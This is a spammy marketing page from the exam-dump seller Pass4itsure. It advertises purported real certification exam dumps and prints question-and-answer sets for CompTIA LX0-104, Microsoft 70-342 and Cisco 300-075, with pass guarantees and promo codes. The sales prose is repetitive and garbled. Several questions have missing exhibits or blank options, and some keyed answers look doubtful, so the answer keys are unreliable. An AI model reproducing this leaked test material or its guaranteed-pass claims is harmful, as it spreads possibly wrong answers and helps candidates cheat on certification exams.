I believe people want good career prospects, no matter what industry they are in. Pass4itsure can help people maintain their livelihoods, which is the foundation of quality education and professional certification in this competitive contemporary world. Of course, the highly competitive IT industry is no exception. One day, the Microsoft 70-774 dump problem and the answer became part of the collection is indeed a historic, because it created history. Today, we are committed to your first attempt at Pass4isture 70-774 dump test questions and answer tests for success if you are prepared to test from questions and answers for 70-774 dumps. IT professionals working in the IT field also want a good opportunity to promote work and pay. Pass4itsure Microsoft 70-774 MCSE Practice problem, Microsoft 70-774 Real dump is a website that helps you successfully through Microsoft 70-774 dumps.

100% Pass Rate Pass4itsure Microsoft 70-774 Dumps Free Exam, Real Microsoft 70-774 Dumps Exam PDF On Sale, We Help You Pass Perform Cloud Data Science with Azure Machine Learning (beta). Pass4itsure 70-774 Dumps Exam Youtube Free Online Test Here:

Preparing for Latest Best Quality Microsoft 70-463 Dumps PDF Certification Exam Questions Youtube Study Download for Implementing a Data Warehouse with Microsoft SQL Server 2012 (From Google Drive)

Pass4itsure Promo Code 15% Off
70-774 dumps

[2018 CompTIA Dumps Video] Real CompTIA LX0-104 Dumps Exam CompTIA Linux+ Certification With High Quality Youtube Study Guides (100+ Questions) 1-29

What happened to the dates for LX0-104 dumps dumps? Everything you require to get ready and quickly pass the tough Linux+ LX0-104 exam in first attempt. Pass4itsure LX0-104 dumps CompTIA Linux+ [Powered by LPI] 2 consists all the necessary tools and information to help you pass LX0-104 CompTIA certification exam. Pass4itsure is the right choice to provide you CompTIA LX0-104 dumps. It is a proctored exam offered by CompTIA. These dumps have LX0-104 exam questions answers in both PDF and Online Test Engine formats. This exam is available in English. All pass4itsure LX0-104 dump exam question answers are written to the highest standards of technical accuracy by our certified professionals.  Candidates connected with IT field can apply for LX0-104 dumps CompTIA certification exams. Pass4itsure offers free LX0-104 test questions demo.You can check out the interface, question quality and usability of our LX0-104 practice test before you choose to buy it.

Do you provide free updates?

We have latest LX0-104 exam dumps which are 100% valid and latest ones. We assure you will pass the exam successfully with our LX0-104 dumps practice tests. Yes, once there are some changes on LX0-104 exam, we will update the study materials timely to make sure that our customer can download the latest edition. With our LX0-104 exam questions study material you can easily pass your exam. The updates are provided free for 120 days. Pass4itsure is here to provide you CompTIA LX0-104 exam questions in pdf and online test engine format.

[2018 Pass4itsure CompTIA LX0-104 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=0BwxjZr-ZDwwWa3VFTWozSjhRMXM

[2018 Pass4itsure CompTIA N10-005 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=0BwxjZr-ZDwwWVEVFWkVBZVEzM28

Following CompTIA LX0-104 Dumps 120QAs Are All New Published By Pass4itsure (1-29)

QUESTION 1
Which of the following is a correct entry in the /etc/hosts file?
A. localhost 127.0.0.1 localhost.localdomain
B. localhost.localdomain localhost 127.0.0.1
C. localhost localhost.localdomain 127.0.0.1
D. 127.0.0.1 localhost.localdomain localhost
E. localhost.localdomain 127.0.0.1 localhost
LX0-104 exam Correct Answer: D

QUESTION 2
Which of the following statements is valid in the file /etc/nsswitch.conf?
A. multi on
B. 192.168.168.4 dns-server
C. hosts: files dns
D. include /etc/nsswitch.d/
Correct Answer: C

QUESTION 3
What is NTP?
A. A more secure protocol replacement for FTP.
B. A protocol for synchronizing time on computers.
C. A routing aid for finding next hops on a network.
D. A simple tunnelling protocol for computers behind firewalls.
LX0-104 dumps Correct Answer: B

QUESTION 4
Which of the following files, when existing, affect the behavior of the Bash shell? (Choose TWO correct answers.)
A. ~/.bashconf
B. ~/.bashrc
C. ~/.bashdefaults
D. ~/.bash_etc
E. ~/.bash_profile
Correct Answer: BE

QUESTION 5
Which of the following statements is true regarding the /etc/shadow file?
A. /etc/shadow may not be readable or writable by user root.
B. Only root is allowed to read and write /etc/shadow.
C. All users have full read and write access to /etc/shadow.
D. All users have full read access to /etc/shadow.
Correct Answer: B

QUESTION 6
Why should a regular user edit his personal crontab by using the command crontab instead of just editing his crontab file manually?
A. Because user specific crontab entries are stored in a common database and must be extracted before editing.
B. Because crontab starts the cron daemon in case it is not running due to no other crontab entries existing.
C. Because user specific crontab entries are stored in a special directory which is maintained by the cron daemon and
not writable for regular users.
D. Because crontab collects information about all users crontabs and recommends similar commands used by other users of the system.
LX0-104 pdf Correct Answer: C

QUESTION 7
Which of the following is true regarding the mail queue of a mail server? (Choose TWO correct answers.)
A. The messages in the queue must be readable by all users as the queue may contain messages for several users.
B. According to the Filesystem Hierarchy Standard (FHS) the queue is located at /var/mail/spool.
C. There is exactly one mail queue per user which holds all new messages for that user before they are moved to other
folders by the user\’s mail client.
D. The queue holds all messages that are processed by the mail server but have not yet been completely delivered.
E. The content of the mail queue can be queried by the command mailq.
Correct Answer: DE

QUESTION 8
Which of the following files holds the configuration for journald when running systemd?
A. /etc/systemd/journalctl.conf
B. /etc/systemd/journald.conf
C. /etc/systemd/systemd-journald.conf
D. /etc/systemd/systemd-journalctl.conf
E. /usr/lib/systemd/journalctl.conf
LX0-104 vce Correct Answer: B

QUESTION 9
Which of the following commands can be used to associate open TCP ports with the processes that opened the ports?
A. ptrace
B. strace
C. debug
D. nessus
E. lsof
Correct Answer: E

QUESTION 10
When the command echo $? outputs 1, which of the following statements are true?
A. It is the process ID of the echo command.
B. It is the process ID of the current shell.
C. It is the exit value of the command executed immediately before echo.
D. It is the exit value of the echo command.
LX0-104 exam Correct Answer: C

QUESTION 11
What entry can be added to the syslog.conf file to have all syslog messages generated by a system displayed on
console 12?
A. *.* /dev/tty12
B. /var/log/messages | /dev/tty12
C. | /dev/tty12
D. syslog tty12
E. mail.* /dev/tty12
Correct Answer: A

QUESTION 12
Which of the following details can be found in an entry of a user specific crontab? (Choose TWO correct answers.)
A. The verbal description of the job.
B. The syslog facility to where the output of the job should be sent.
C. The time when the cron job should run.
D. The command that should be started by the cron job.
E. The name of the user which should run the job.
LX0-104 dumps Correct Answer: CD

QUESTION 13
Which of the following commands are used to manage the environment and shell variables within a shell process? (Choose TWO correct answers.)
A. export
B. init
C. reset
D. set
E. tset
Correct Answer: AD

QUESTION 14
What is true about the ntpdate command?
A. It is the primary management command for the NTP time server.
B. It updates the local system\’s date (i.e. day, month and year) but not the time (i.e. hours, minutes, seconds).
C. It queries one or more NTP time servers and adjusts the system time accordingly.
D. It sends the local system time to one or many remote NTP time servers for redistribution.
E. It can be used by any user to set the user clock independently of the system clock.
LX0-104 pdf Correct Answer: C

QUESTION 15
Which of the following resources can be directly limited for a given user using ulimit? (Choose THREE correct answers.)
A. Maximum seconds of CPU time spent.
B. Maximum number of open file descriptors.
C. Maximum number of processes available.
D. Maximum number of concurrent login sessions.
E. Maximum seconds of login duration per session.
Correct Answer: ABC

QUESTION 16
Each entry in a crontab must end with what character?
A. Tab
B. Space
C. Backslash
D. Newline
LX0-104 vce Correct Answer: D

QUESTION 17
Which of the following are valid IPv4 network masks? (Choose TWO correct answers.)
A. 255.255.0.0
B. 255.255.255.65
C. 255.255.0.255
D. 0.0.0.1
E. 255.255.255.248
Correct Answer: AE

QUESTION 18
Which of the following fields can be found in the /etc/group file? (Choose THREE correct answers.)
A. The list of users that belong to the group.
B. The home directory of the group.
C. The name of the group.
D. The description of the group.
E. The password of the group.
LX0-104 exam Correct Answer: ACE

QUESTION 19
Which commands can be used to change a user\’s account aging information? (Choose THREE correct answers.)
A. usermod
B. passwd
C. chattr
D. chage
E. chsh
Correct Answer: ABD

QUESTION 20
Which configuration file would be edited to change the default options for outbound SSH sessions?
A. /etc/ssh/sshd_config
B. /etc/ssh/ssh
C. /etc/ssh/client
D. /etc/ssh/ssh_config
E. /etc/ssh/ssh_client
LX0-104 dumps Correct Answer: D

QUESTION 21
What is not contained in the locale setting of the operating system?
A. currency symbol
B. language
C. timezone
D. thousands separator
Correct Answer: C

QUESTION 22
Which of the following keywords can be used in the file /etc/resolv.conf? (Choose TWO correct answers.)
A. substitute
B. nameserver
C. search
D. lookup
E. method
LX0-104 pdf Correct Answer: BC

QUESTION 23
With syslog, what is a facility?
A. Facilities are different connection interfaces to syslog. Each facility has its own device in /dev/syslog/.
B. From syslog\’s point of view, each Unix process that issues messages is a facility.
C. Facilities describe the severity of a log message such as emerg or info.
D. When using remote logging, the hostname of the server that generated a message is called facility.
E. Facilities describe categories or groups of messages such as mail or auth.
Correct Answer: E

QUESTION 24
Which of the following IPv4 networks are reserved by IANA for private address assignment and private routing? (Choose THREE correct answers.)
A. 127.0.0.0/8
B. 10.0.0.0/8
C. 169.255.0.0/16
D. 172.16.0.0/12
E. 192.168.0.0/16
LX0-104 vce Correct Answer: BDE

QUESTION 25
On a machine running several X servers, how are the different instances of the X11 server identified?
A. By a fixed UUID that is defined in the X11 configuration file.
B. By a unique IPv6 address from the fe80::/64 subnet.
C. By the name of the user that runs the X server like x11:bob.
D. By a device name like /dev/X11/xservers/1.
E. By a display name like:1.
Correct Answer: E

QUESTION 26
Which of the following tools used for DNS debugging, reports not only the response from the name server but also details about the query?
A. dnsq
B. dig
C. hostname
D. dnslookup
E. zoneinfo
LX0-104 exam Correct Answer: B

QUESTION 27
Which of the following commands gets the GnuPG public key with the id 63B4835B from the keyserver example.com?
A. gpg –keyserver hkp://example.com –recv-key 63B4835B
B. gpg –search-key hkp://[email protected]
C. gpg –keyserver gpg://example.com –get-key 63B4835B
D. gpg –keyserver hkp://example.com –add-key 63B4835B
E. gpg –keyserver gpg://example.com –key 63B4835B
Correct Answer: A

QUESTION 28
What is the main difference between the batch and at commands?
A. The batch command will run multiple times. The at command will only run once.
B. The commands of a batch job run sequentially one after another while the commands in at jobs may run in parallel.
C. The at command reads commands from standard input. The batch command requires a command line argument.
D. The at command e-mails results to the user. The batch command logs results to syslog.
LX0-104 dumps Correct Answer: B

QUESTION 29
How is a display manager started?
A. It is started by a user using the command startx.
B. It is started like any other system service by the init system.
C. It is started by inetd when a remote hosts connects to the X11 port.
D. It is started automatically when a X11 user logs in to the system console.
Correct Answer: B

We get latest LX0-104 questions answers and provide you as earliest as possible so that you can prepare and pass CompTIA exams in first attempt. Although when embarked upon this adventure meant to achieve a standard of academic excellence in information technology, we had a vision but no expectations. Get our CompTIA LX0-104 exam dumps and get good grades. Our LX0-104 exam questions are 100% valid and updated ones.  Download FREE pass4itsure LX0-104 dumps exam questions demo and see how over 90,000 satisfied customers passed their exams in first attempt without any difficulty. This surely has made our day.

Pass4itsure Practice Exams for LX0-104 are written to the highest standards of technical accuracy, provided by our certified subject matter experts and published authors for development. We had been looking forward to promising a great future to all our customers, we never knew that one day we would be saying “Success Guaranteed” to everyone, and that it will be become our selling punch line, our motto. We guarantee the best quality and accuracy of our products. We hope you pass the LX0-104 dumps exams successfully with our practice exams.

LX0-104 dumps

With our CompTIA LX0-104 materials, you will pass your exam easily at the first attempt. CompTIA LX0-104 dumps (CompTIA Linux+ [Powered by LPI] 2) can help people maintain their livelihoods are basis of good quality education and specialized certification in this competitive contemporary world. You can also enjoy 180 days free update for your product. And this is a CompTIA technology. Pass CompTIA LX0-104 dumps exam with great confidence along with thousands of other exams. This exam is specially linked with CompTIA certification exam. Pass4itsure has built up the confidence of millions of candidates by helping them to pass their exams securing highest marks with LX0-104 dumps.

pass4itsure LX0-104 dumps
Pass4itsure can help people maintain their livelihoods are basis of good quality education and specialized certification in this competitive contemporary world. We are well aware of the fact, that quality Linux+ LX0-104 dumps practice test questions answers study material is the first step toward your success in passing any exam. The day CompTIA LX0-104 dumps questions and answers became a part of the set is indeed a historical one, since it made history. We provide the most excellent study material having all the LX0-104 practice exam questions answer designed and verified by the dedicated Professional Experts.

Today we promise you success at your first attempt at pass4isture LX0-104 dumps exam questions and answers test , if you prepare from the questions and answers for LX0-104 dumps test. Our quality CompTIA LX0-104 exam questions study material with LX0-104 practice questions answers provides you the opportunity with full confidence to pass your certification exam in first attempt.

Sale Pass4itsure CompTIA LX0-104 Dumps Study Guides, Real CompTIA LX0-104 Dumps Certification With High Quality, We Help You Pass CompTIA Linux+ [Powered by LPI] 2. Pass4itsure LX0-104 Dumps Exam Youtube Free Online Test Here:

Pass4itsure Promo Code 15% Off

LX0-104 dumps

[2018 Microsoft Dumps Video] Make Up the Mind for The Best Microsoft 70-342 Dumps Dumps PDF With MCSE2003 Messaging Exam Accurate Answers Youtube Training (100+ Questions) 1-10

What is exam marking system for Microsoft 70-342 dumps? Pass4itsure 70-342 dumps pdf: Advanced Solutions of Microsoft Exchange Server 2013 consists all the necessary tools and information to help you pass 70-342 MCP, MCSE certification exam. After deciding to go for the preparation of Microsoft 70-342 dumps new questions and answers, there comes the time to study and work hard to achieve success.  It is a proctored exam offered by Microsoft. This exam is available in English, Chinese (Simplified), French, German, Japanese, Portuguese (Brazil). Multiple learning methods in the software facilitate learning difficult parts of the curriculum and your learning become quicker. Candidates connected with IT field can apply for 70-342 dumps Microsoft certification exams.

Do you provide free updates?

Yes, once there are some changes on 70-342 exam, we will update the study materials timely to make sure that our customer can download the latest edition. Simulation of 70-342 dumps Advanced Solutions of Microsoft Exchange Server 2013 real exam scenarios enables you for customizable learning and the self-assessment feature allows you to assess your preparation time to time in order to make it perfect. The updates are provided free for 120 days. Certification Experts, Certified Computer Trainers, Technical Coworker and Comprehensive Language Masters, who have a solid, verified and certified background and high technical expertise, have compiled these detailed questions and answers.

[2018 Pass4itsure Microsoft 70-342 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=1BOGhsYr1BSxrNj2zf6B2NOhoB5Qpu8sM

[2018 Pass4itsure Microsoft 70-411 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=1joeuiSfVNTXs_IsqJQfZkqkNHEw298vI

Following Microsoft 70-342 Dumps 180QAs Are All New Published By Pass4itsure (1-10)

QUESTION 1
You plan to deploy 20 Client Access servers that will have Exchange Server 2013 installed. You need to prepare the certificate required for the planned deployment. The solution must ensure that the same certificate can be used on all of the Client Access servers. What should you do first?
A. On one of the Client Access servers, run the New-ExchangeCertificate cmdlet and specify the privatekeyexportable parameter.
B. On all of the Client Access servers, run the Get-ExchangeCertificate cmdlet.
C. On one of the Client Access servers, run the New-ExchangeCertificate cmdlet and specify the binaryencoded parameter.
D. On one of the Client Access servers, start the Certificates console and run the Certificate Import Wizard.
70-342 exam Correct Answer: A

QUESTION 2
Contoso, Ltd., and Fabrikam, Inc., are partner companies. Each company has an Exchange Server 2013 organization in a data center that is connected to the Internet. All of the Exchange servers in both of the organizations have the Client Access server role and the Mailbox role installed. The data centers connect to each other by using a redundant high-speed WAN link. The following mail exchanger (MX) records are configured:
* Contoso.com MX 10 mail.contoso.com
* Fabrikam.com MX 10 mail.fabrikam.com
You need to recommend a solution for inbound mail flow.
The solution must meet the following requirements:
* Users in both companies must receive email from the Internet if either of the Internet links fails.
* Mail from the Internet to contoso.com must be received by mail.contoso.com if the Internet link at the Contoso data center is available.
* Mail from the Internet to fabrikam.com must be received by mail.fabrikam.com if the Internet link at the Fabrikam data center is available.
Which two actions should you recommend? (Each correct answer presents part of the solution. Choose two.)
A. Create the following DNS records:
* Contoso.com MX 20 mail.fabrikam.com
* Fabrikam.com MX 20 mail.contoso.com
B. Create the following DNS records:
* Contoso.com MX 10 mail.fabrikam.com
* Fabrikam.com MX 10 mail.contoso.com
C. For each organization, configure an internal relay domain and a Send connector.
D. For each organization, configure an external relay domain and a Receive connector.
E. Create the following DNS records:
* Contoso.com MX 5 mail.fabrikam.com
* Fabrikam.com MX 5 mail.contoso.com
Correct Answer: AC

QUESTION 3
You have an Exchange Server 2013 organization that contains two servers. The servers are configured as shown in the following table.
70-342 dumps
EX1 and EX2 are members of a database availability group (DAG) named DAG1. You have a database named DB1 that replicates to EX1 and EX2. EX1 fails. You discover that DB1 does not mount on EX2. You view the status of the mailbox databases as shown in the following table.
70-342 dumps
You need to ensure that the database attempts to mount on EX2 if EX1 fails. What should you change?
A. The AutoDatabaseMountDial setting to Lossless
B. The AutoDatabaseMountDial setting to BestAvailabilty
C. The activation preference of DB1\EX2
D. The activation preference of DB1\EX1
70-342 dumps Correct Answer: B

QUESTION 4
Your company has a data center in New York and a data center in Miami. The company has an Exchange Server 2013 organization that contains a database availability group (DAG). The DAG contains servers in both data centers. The company plans to deploy Outlook Anywhere to all users. You configure the following: All of the Exchange Server 2013 virtual directories in the New York data center use a host name of mail.contoso.com.
All of the Exchange Server 2013 virtual directories in the Miami data center use a host name of miami.mail.contoso.com. In each data center, a certificate from an enterprise certification authority (CA) is configured to contain the following: A certificate principal name of mail.contoso.com Subject alternate names of mail.contoso.com and miami.mail.contoso.com You need to recommend which task must be performed to meet the following requirements: Users always must attempt to connect first to a server in the data center where their mailbox is located. Users must be able to access their mailbox if a single data center fails. What should you recommend?
A. Change the external host name of the Miami data center to mail.contoso.com.
B. Modify the ExternalUrl of the Autodiscover virtual directory of the Client Access servers.
C. Run the Set-OutlookProvider cmdlet.
D. Run the Add-AvailabilityAddressSpace cmdlet.
Correct Answer: B

QUESTION 5
Your company has offices in Tokyo, Bangkok, and Shanghai. All connections to the Internet are routed through an Internet connection in the Tokyo office. All of the offices connect to each other by using a WAN link. The network contains 10 servers that have Exchange Server 2010 installed. The servers are configured as shown in the following table.
70-342 dumps
You plan to deploy 10 servers that will have Exchange Server 2013 installed.
The servers will be configured as shown in the following table.
70-342 dumps
Each site has an IP-PBX that provides telephony services for the mailboxes in that site by using unsecured SIP over TCP 5070. The IP-PBX uses the same port to connect to multiple SIP peers. You need to recommend which tasks must be performed to ensure that the Unified Messaging (UM) features are available to the mailboxes if a single server fails.
Which three actions should you include in the recommendation? (Each correct answer presents part of the solution. Choose three.)
A. Configure the Exchange Server 2013 Mailbox servers to listen to unsecured SIP on TCP 5070.
B. Configure the Exchange Server 2013 Client Access servers to listen to unsecured SIP on TCP 5070.
C. Install the Client Access server role on the Exchange Server 2013 servers in the Shanghai and Bangkok offices.
D. Configure the Exchange Server 2013 Mailbox servers as additional SIP peers that contain new pilot identifiers.
E. Configure the Exchange Server 2013 Client Access servers as additional SIP peers that contain new pilot identifiers.
70-342 pdf Correct Answer: BCE

QUESTION 6
You have an Exchange Server organization that contains five servers. The servers are configured as shown in the following table.
70-342 dumps
You need to create a Lync Server SIP Unified Messaging (UM) dial plan to enable voice integration between Lync Server and Exchange Server. Which three Exchange servers should you associate to the UM dial plans? (Each correct answer presents part of the solution. Choose three.)
A. EX1
B. EX2
C. EX3
D. EX4
E. EX5
Correct Answer: CDE

QUESTION 7
You have an Exchange Server 2013 organization. You successfully migrate the public folders from a previous version of Exchange Server. You discover that one of the public folder mailboxes almost reached its quota size. You need to move some of the public folders in the public folder mailbox to another public folder mailbox. What should you run?
A. Split-PublicFolderMailbox.ps1
B. Set-MailPublicFolder
C. Update-PublicFolderMailbox
D. Set-PublicFolderMailbox
70-342 vce Correct Answer: A

QUESTION 8
You have a hybrid deployment of Exchange Server 2013 and Microsoft Office 365. The network does not have Active Directory Federation Services (AD FS) 2.0 installed. A user named User1 reports that he cannot access his mailbox because his account is locked out.
You verify that the mailbox of User1 is hosted on Office 365. You need to unlock the account of User1. Which cmdlet should you run?
A. Set-MailUser
B. Set-MSolUser
C. Set-Mailbox
D. Set-ADUser
Correct Answer: B

QUESTION 9
You have a hybrid deployment of Exchange Server 2013 and Office 365. The mail flow between Office 365 and the on-premises Exchange Server environment is routed through an Exchange Server 2010 Edge Transport server. Your company is assigned a new set of public IP addresses. A network administrator updates the external firewall address and all of the associated DNS records. Office 365 users report that they cannot receive email messages from on-premises users. You discover that outgoing email messages to Office 365 are in the Office 365 SMTP queue on an Edge server. You need to ensure that the on-premises users can send email messages successfully to the Office 365 users. Which tool should you use?
A. The Exchange Management Console
B. The Exchange Control Panel in Office 365
C. The Exchange Admin Center
D. The Exchange Remote Connectivity Analyzer
70-342 exam Correct Answer: C

QUESTION 10
You have an Exchange Server 2013 organization named adatum.com. The organization contains five Mailbox servers. You need to prevent a user named User8 from permanently deleting an email message in his mailbox. What should you do on the mailbox of User8?
A. Configure an in-place hold.
B. Create an Archive mailbox.
C. Configure a retention hold.
D. Create a Retention tag.
Correct Answer: A

Our 70-342 dumps exam will provide you with exam questions and verified answers that reflect the actual exam. Although when embarked upon this adventure meant to achieve a standard of academic excellence in information technology, we had a vision but no expectations. Advanced Solutions of Microsoft Exchange Server 2013 exam experts can, however, for the best Microsoft Exchange Server 2013 70-342 pdf dumps for their Microsoft certification exams or they can even take help from the Microsoft Exchange Server 70 342 sample questions available at pass4itsure.com for preparation of Microsoft Exchange Server 2013 70-342 exam. Download FREE pass4itsure 70-342 dumps exam questions demo and see how over 90,000 satisfied customers passed their exams in first attempt without any difficulty. This surely has made our day. We had been looking forward to promising a great future to all our customers, we never knew that one day we would be saying “Success Guaranteed” to everyone, and that it will be become our selling punch line, our motto.
70-342 dumps

Microsoft 70-342 dumps (Advanced Solutions of Microsoft Exchange Server 2013) can help people maintain their livelihoods are basis of good quality education and specialized certification in this competitive contemporary world. They should have all the knowledge about their skills that they must need for passing their Microsoft 70-342 dumps Microsoft Exchange Server 2013 test questions. And this is a Microsoft Exchange Server 2013 technology. This exam is specially linked with MCP, MCSE certification exam. These questions and answers provide you with the experience of taking the actual test. Microsoft Certification preparation Q and A provided by pass4isture.com will make you feel like you are taking an actual exam at a Prometric or VUE center.
pass4itsure 300-075 dumps
Pass4itsure can help people maintain their livelihoods are basis of good quality education and specialized certification in this competitive contemporary world. However, the best thing about the pass4itsure.com is that we deal with the Microsoft Exchange Server practice test software for the preparation of 70-342 exam questions, so that it becomes easier for Advanced Solutions of Microsoft Exchange Server 2013 exam professionals to prepare and succeed in their Microsoft certification exams. The day Microsoft 70-342 dumps questions and answers became a part of the set is indeed a historical one, since it made history. Our 70-342 exam is not just questions and answers. They are your access to high technical expertise and accelerated learning capacity. Today we promise you success at your first attempt at pass4isture 70-342 dumps exam questions and answers test , if you prepare from the questions and answers for 70-342 dumps test.

The Best Pass4itsure Microsoft 70-342 Dumps Question Description, Real Microsoft 70-342 Dumps PDF With Accurate Answers, We Help You Pass Advanced Solutions of Microsoft Exchange Server 2013. Pass4itsure 70-342 Dumps Exam Youtube Free Online Test Here:

Pass4itsure Promo Code 15% Off

70-342 dumps

[2018 Cisco Dumps Video] 100% Pass Cisco 300-075 Dumps CIPTV2 PDF Exam CCNP Collaboration Youtube Study Guide Online (400+ Questions) 25-40

Are you ready to take actual Cisco 300-075 dumps exam? Pass4itsure 100% Pass Cisco 300-075 Dumps Exam Guide, Real Cisco 300-075 Dumps Exam Online, We Help You Pass Implementing Cisco IP Telephony & Video, Part 2 v1.0 – pass4itsure 300-075 dumps (400+ Questions) 1-20

300-075: Implementing Cisco IP Telephony & Video, Part 2 v1.0 dumps consists all the necessary tools and information to help you pass Cisco 300-075 CCNP Collaboration certification exam. Implementing Cisco IP Telephony and Video Part 2 (CIPTV2) exam is a popular certification program offered by Cisco and every IT professional want to pass 300-075 exam in first attempt but it is only possible when you have complete preparation of CIPTV2 300-075 dumps. It is a proctored exam offered by Cisco. This exam is available in English. Candidates connected with IT field can apply for 300-075 dumps Cisco certification exams.

Do you provide free updates?

It is possible to pass Cisco 300-075 in first attempt with full marks as we are offering 300-075 training material for this CCNP Collaboration 300-075 exam which have all the features by which one can easily pass 300-075 dumps exam. Yes, once there are some changes on 300-075 exam, we will update the study materials timely to make sure that our customer can download the latest edition. The updates are provided free for 120 days.

[2018 Pass4itsure Cisco 300-075 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=0BwxjZr-ZDwwWTk00ekx3V0xfX3c

[2018 Pass4itsure Cisco 300-101 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=0BwxjZr-ZDwwWWDdYaFM0SVFwMTA

It is also necessary to check the complete course outline and prepare from all the 300-075 new questions, CCNP Collaboration 300-075 dumps pdf questions and Practice Test, included in our 300-075 training material.

300-075 dumps

Following Cisco 300-075 Dumps 420QAs Are All New Published By Pass4itsure (25-40)

QUESTION 25
When configuring intercluster URI dialing, an engineer gets the error message andquot;Local cluster cannot connect to the ILS networkandquot;. Which three reasons for this error are true? (Choose three.)
A. The SIP route patterns have not been properly configured.
B. The Tomcat certificates do not match.
C. The Cisco Unified Resource Identifier service needs a restart.
D. The ILS authentication password does not match.
E. The cluster ID does not match.
F. One cluster is using TLS certificate, and the other is using Password.
300-075 exam Correct Answer: CDF

QUESTION 26
Which option is a benefit of implementing CFUR?
A. CFUR is designed to initiate TEHO to reduce toll charges.
B. CFUR can prevent phones from unregistering.
C. CFUR can reroute calls placed to a temporarily unregistered destination phone.
D. CFUR eliminates the need for COR on an ISR.
Correct Answer: C

QUESTION 27
Which option best describes a service that assembles a network model from configured locations and link data in one or more clusters?
A. LBM
B. Weight
C. LBM Hub
D. Shadow
300-075 dumps Correct Answer: A

QUESTION 28
Scenario:
There are two call control systems in this item. The Cisco UCM is controlling the Cisco Jabber for Windows Client, and the 7965 and 9971 Video IP Phone. The Cisco VCS is controlling the SX20, the Cisco TelePresence MCU, and the Cisco Jabber TelePresence for
Windows.DP:
300-075 dumps
300-075 dumps
300-075 dumps
300-075 dumps
300-075 dumps
300-075 dumps
Both of the Cisco TelePresence Video for Windows clients are able to log into the server but can\’t make any calls. After reviewing the exhibits, which of the following reasons could be causing this failure?
A. Wrong username and/or password.
B. Wrong SIP domain name.
C. The TMSPE is not working.
D. The bandwidth is incorrectly configured.
Correct Answer: D

QUESTION 29
Which statement about setting up FindMe in Cisco TelePresence Video Communication Server is true?
A. Users are allowed to delete or change the address of their principal devices.
B. Endpoints should register with an alias that is the same as an existing FindMe ID.
C. If VCS is using Cisco TMS provisioning, users manage their FindMe accounts via VCS.
D. A VCS cluster name must be configured.
300-075 vce Correct Answer: D

QUESTION 30
Scenario There are two call control systems in this item. The Cisco UCM is controlling the DX650, the Cisco Jabber for Windows Client, and the 7965 and 9971 Video IP Phones. The Cisco VCS and TMS control the Cisco TelePresence Conductor, the Cisco TelePresence MCU, and the Cisco Jabber TelePresence for Windows. Use the exhibits to answer the following questions. DNS Servers
300-075 dumps
300-075 dumps
300-075 dumps
300-075 dumps
Which three configuration tasks need to be completed on the router to support the registration of Cisco Jabber clients? (Choose three.)
A. The DNS server has the wrong IP address.
B. The internal DNS Service (SRV) records need to be updated on the DNS Server.
C. Flush the DNS Cache on the client.
D. The DNS AOR records are wrong.
E. Add the appropriate DNS SRV for the Internet entries on the DNS Server.
300-075 exam Correct Answer: BCE

QUESTION 31
Refer to the exhibit.
300-075 dumps
An engineer receives a ticket to troubleshoot a one-way audio issue with these symptoms:
User A can hear user and vice versa.
User A can hear user C, however user cannot hear user A.
User can heat user C, however user cannot hear user .
Which two properties are the most likely reasons for this issue? (Choose two.)
A. The Cisco EX60 default gateway of user is missing from the network configuration.
B. The NAT device is allowing only RTP/RTCP ports from the internal network to the DMZ.
C. The Cisco EX60 of user is not responding to requests coming from the TMS server.
D. The Cisco VCS Expressway is not responding to the SIP INVITE coming from the Cisco VCS Control.
E. The router does not have a route back from the DMZ to the internal network.
300-075 dumps Correct Answer: CE

QUESTION 32
Scenario:
The Cisco UCM is controlling the DX650, the Cisco Jabber for Windows Client, and the 9971 Video IP Phone. The Cisco VCS and TMS control the Cisco TelePresence MCU, and the Cisco Jabber TelePresence for Windows
300-075 dumps
300-075 dumps
300-075 dumps
Which device configuration option will allow an administrator to control bandwidth between calls placed between branches?
A. Media Resource Group List
B. Device Pool
C. Location
D. AAR Group
E. Regions
Correct Answer: C

QUESTION 33
When you use the Query wizard to configure the trace and log central feature to collect install logs, if you have servers in a cluster in a different time zone, which time is used?
A. TLC adjusts the time change appropriately.
B. TLC uses its local time for all systems.
C. TLC queries for the time zone as part of configuration.
D. TLC produces an error and must be run remotely.
300-075 pdf Correct Answer: A

QUESTION 34
The Cisco Unified Communications system of a company has five types of devices: Cisco Jabber Desktop
CP-7965
DX-650
EX-60
MX-200
Which two types of devices are affected when an engineer changes the DSCP for Video Calls service parameter? (Choose two.)
A. DX-650
B. Cisco Jabber Desktop
C. CP-7965
D. EX-60
E. MX-200
Correct Answer: AC

QUESTION 35
What is the default DSCP/PHB for TelePresence video conferencing packets in Cisco Unified Communications Manager?
A. EF/46
B. CS6/48
C. AF41/34
D. CS3/24
E. CS4/32
300-075 exam Correct Answer: E

QUESTION 36
How many Cisco Unified Mobility destinations can be configured per user?
A. 1
B. 10
C. 4
D. 6
Correct Answer: B

QUESTION 37
Which task must you perform before deleting a transcoder?
A. Delete the dependency records.
B. Unassign it from a media resource group.
C. Use the Reset option.
D. Remove the device pool.
E. Remove the subunit.
F. Delete the common device configuration.
300-075 dumps Correct Answer: B

QUESTION 38
Company X has deployed a VCS Control with a local zone and a traversal client zone. To facilitate external calls, VCS Expressway is deployed and traversal server zone is set up there. Video endpoints inside Company X have registered, but are unable to receive calls from outside endpoints. Which option could be the cause of this issue?
A. The traversal zone on the VCS Control does not have a search rule configured.
B. The access control list on the VCS Control must be updated with the IP for the external users.
C. When a traversal zone is set up on VCS Control only outbound calls are possible.
D. The local zone on the VCS Control does not have a search rule configured.
Correct Answer: B

QUESTION 39
Widgets.com\’s Cisco TelePresence Video Communication Server allows SIP and H.323 registrations. Which local zone search rule configuration allows SIP registered endpoints to connect to H.323 endpoints that register with an H.323 E.164 number only?
A.
B.
300-075 dumps
C.
D.
300-075 dumps
QUESTION 40
Company A has deployed a VCS Control and is attempting to register a third-party endpoint. The engineer has confirmed that no traffic is being blocked for the endpoint and it is receiving a valid IP address. Which option could be the cause of this registration failure?
A. Third-party endpoints are not compatible with VCS Control, only with VCS Expressway.
B. Cisco Unified Communications Manager is required in addition to the VCS Control.
C. An incorrect SIP domain is configured on the VCS Control for the endpoint.
D. The VCS Control must be deployed together with VCS Expressway before endpoints can register to either one.
300-075 exam Correct Answer: C

300-075 dumps

See What Our Customers Are Saying:

